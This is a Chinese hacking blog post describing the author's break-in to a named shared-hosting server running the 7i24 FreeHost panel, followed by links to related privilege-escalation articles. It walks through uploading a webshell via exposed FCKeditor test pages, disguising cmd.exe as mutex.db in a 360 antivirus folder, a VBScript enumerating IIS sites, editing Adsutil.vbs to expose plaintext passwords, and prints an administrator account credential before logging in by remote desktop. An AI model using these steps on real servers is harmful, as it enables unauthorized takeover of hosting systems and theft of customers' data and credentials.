php星外提权,一次星外虚拟主机的提权
今天看到个大马多功能防asp木马查杀内部测试版(有后门)看了下.换客网
www.taoyuanbao.com
小小检测了下绝对没啥可利用的。直接旁注几分钟拿下了个shell貌似运气好,随便打开个旁站。
手工输入 fckeditor路径 …。存在…
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
直接上传一句话。aspx的站 … 直接上大马…看了下路径d:\freehost 星外的主机。
在土司找到星外提权“新思路”
把cmd.exe改名成mutex.db扔到这个目录
c:\Program Files\360\360Safe\deepscan\Section\
把cmd路径改成c:\Program Files\360\360Safe\deepscan\Section\mutex.db
可以执行cmd了。继续
Set ObjService=GetObject(“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
sServerName=Obj3w.ServerComment
Set webSite = GetObject(“IIS://Localhost/W3SVC/” & obj3w.Name &
“/Root”)
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name),” “)
& obj3w.ServerComment & “(” & webSite.Path & “)” & vbCrLf
End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit
保存为1 直接执行 /c cscript d:\freehost\xxx\web\1.vbs
执行成功后就会列出IIS的基本信息了。
44260001 7i24虚拟主机管理平台受控端
(C:\WINDOWS\7i24.com\FreeHost)
在扔个adsutil.vbs上去,如果不能执行的话自己上传个cscript.exe
/c cscript d:\freehost\xxx\web\Adsutil.vbs enum w3svc/44260001/root
备注:如果密码不是明文密码,必须修改 Adsutil.vbs,使它显示明码。
请按照下列步骤操作:
1.在记事本中打开 Adsutil.vbs。
2.在”编辑”菜单上,单击查找,键入 IsSecureProperty = True,然后单击查找下一个。
3.将”IsSecureProperty = True”更改为”IsSecureProperty = False”。
4.保存对 Adsutil.vbs 所做的更改,然后关闭记事本。
7i24虚拟主机管理平台受控端
freehostrunat 83e0843d0091c43c4837bea224ebf197!7 (没加密直接登陆即可)
Freehostrunat这个用户是安装星外时候建立的,属于administrators用户组里的。
23000000 taoyuanbao.com_yiran8_yiran8(d:\freehost\yiran8\web)
登陆3389打开路径d:\freehost\yiran8\web搞定收工
没什么技术含量 大牛勿喷。BY:KOOK
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/68.html
php星外提权,一次星外虚拟主机的提权相关推荐
- 控制虚拟服务器的软件,虚拟主机控制面板
虚拟主机管理面板官方版是一款专为了虚拟机打造的控制工具.虚拟主机管理面板最新版集开通虚拟主机.ftp.空间.mysql数据库等功能为一体,运行安全.稳定.操作简便.虚拟主机管理面板软件支持磁盘配额.在 ...
- 虚拟主机有Linux么
虚拟主机有Linux么?有,虚拟主机不光有Windows系统,同样也有Linux系统.Linux是一种开放源代码的操作系统,由于它的自由开放性和技术先进性,顺应了广大软件开发商及用户对信息系统知情权的 ...
- 常见虚拟主机目录对照及星外提权目录
常见虚拟主机目录对照 D:\virtualhost\web580651\www\ 新网虚拟主机 F:\usr\fw04408\xpinfo\ 万网虚 ...
- 星外虚拟主机与php,星外虚拟主机提权拿服务器
本次是对自己的IDC服务器的一次友情检测. 本来服务器就已经拿了N次了.漏洞一直都放在那里. 结果总有人拿到权限就炫耀.至于吗.?我本来就打算去换空间去了. (还有仇家格我站,技术差我还不说什么.还到 ...
- 虚拟许可服务器访问失败,星外虚拟主机访问被控出现Unspecified error解决方法
今天客户在线解压出现了Unspecified error 的错误,我以为是被控的权限,重新重置了受控端依然不行,访问被控依然正常,但http://受控域名/freehost.dll就出现错误,看样子不 ...
- FreeHost星外虚拟主机管理平台
星外虚拟主机管理平台(FreeHost)是一套功能强大.技术领先.价格低廉的服务器自动化管理软件. 利用最先进的开发技术.实施最严密的测试.终于在2004年7月1日正式推出星外虚拟主机全功能版.此平台 ...
- php mysql 星外_星外虚拟主机跨web目录文件读取漏洞
星外虚拟主机跨目录读取文件漏洞,需要一定条件. 问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令: c:\windows\7i24IISLOG.exe ...
- 西部数码php.ini,西部数码虚拟主机提权思路
当前思路也可用于其他虚拟主机. 说明 西部数码虚拟主机安装后默认s-u的LocalAdministrator用户密码为root3306 就算修改了也是可以读取ini文件得到加密密码的 mysql 的r ...
- 虚拟主机封杀WebShell提权!
虚拟主机封杀WebShell提权! (2006-10-17 15:24:45) http://blog.sina.com.cn/s/blog_4560b80b010007py.html 转载▼ 分 ...
最新文章
- 子域名绑定html,DEDE二级域名(多站点)绑定详解
- Data Lake Analytics + OSS数据文件格式处理大全
- UNIX中的Select函数
- 神经网络为什么可以实现分类?---三分类网络0,1,2与弹性振子力学系统
- Qt学习笔记之网络和连接
- 三、spring boot 1.5.4 web容器定制(端口号等修改)
- Openfire3.10beta版源码在eclipse上部署编译
- 测试python第二周_python第二周作业
- 淘宝天猫x-sign算法
- SCI 期刊、SCIE 期刊和 ESCI 期刊的比较
- java 中文转拼音_JAVA 将中文转化为拼音工具类
- 任务调度的合理性 (25 分)
- 如何修清净心?(净空老法师法语)
- C# XmlDocument处理XML元素节点
- 川崎机器人f控制柜接线图_川崎机器人PROFINET总线通信图文教程
- DBeaver 32位 下载安装
- HTML - 鼠标光标属性
- 班主任对学生的成绩分析
- pdf插入页码方法介绍
- could not open selected vm debug port 8700